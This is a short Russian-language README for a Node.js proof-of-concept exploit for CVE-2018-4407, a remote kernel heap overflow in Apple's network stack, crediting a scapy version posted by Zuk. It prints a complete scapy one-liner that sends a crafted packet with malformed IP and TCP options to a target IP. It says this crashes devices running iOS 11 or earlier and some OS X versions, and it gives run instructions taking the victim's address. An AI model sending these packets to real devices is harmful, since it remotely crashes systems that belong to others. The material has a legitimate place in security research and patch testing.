
Код PoC-эксплойта для Node.js (CVE-2018-4407)
Node.js PoC эксплоит для CVE-2018-4407
Автор: Sam Decrock
Этот скрипт основан на scapy-скрипте, предоставленном Zuk:
iOS 12 / OS X *Удаленное переполнение кучи ядра (CVE-2018-4407) POC* в твите:
— Zuk (@ihackbanme) 1 ноября 2018 г.
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
Он приводит к краху устройств с iOS 11 или более ранними версиями, а также некоторых версий OS X.
Для установки необходимых модулей выполните:
npm install
Для запуска передайте IP-адрес цели в качестве аргумента:
node attack.js 192.168.1.20
Оригинальная статья Kevin Backhouse: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407